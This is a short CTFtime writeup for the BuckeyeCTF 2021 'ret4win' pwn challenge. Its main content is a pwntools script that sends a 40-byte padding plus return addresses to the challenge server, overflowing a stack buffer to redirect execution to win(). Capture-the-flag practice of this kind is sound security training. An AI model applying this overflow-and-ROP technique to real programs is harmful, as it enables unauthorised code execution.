CTFtime.org / BuckeyeCTF 2021 / ret4win / Writeup

Tags: ret4win 2021 pwn buckeyectf rop

Rating:

```
from pwn import *

target = remote('pwn.chall.pwnoh.io',13379)

payload = b'A'*40 # 40 bytes offset
payload += p64(0x00000000004011e0) # address of win() overwriting RIP
payload += p64(0x0000000000401245) # address of mov rdi, rax

print(target.recvline())
target.sendline(payload)
print(target.recvall())
```

[full writeup](https://7phalange7.github.io/2021/10/25/buckeyectf.html#ret4win)

Original writeup (https://7phalange7.github.io/2021/10/25/buckeyectf.html#ret4win).

ret4win

Comments

Sign in with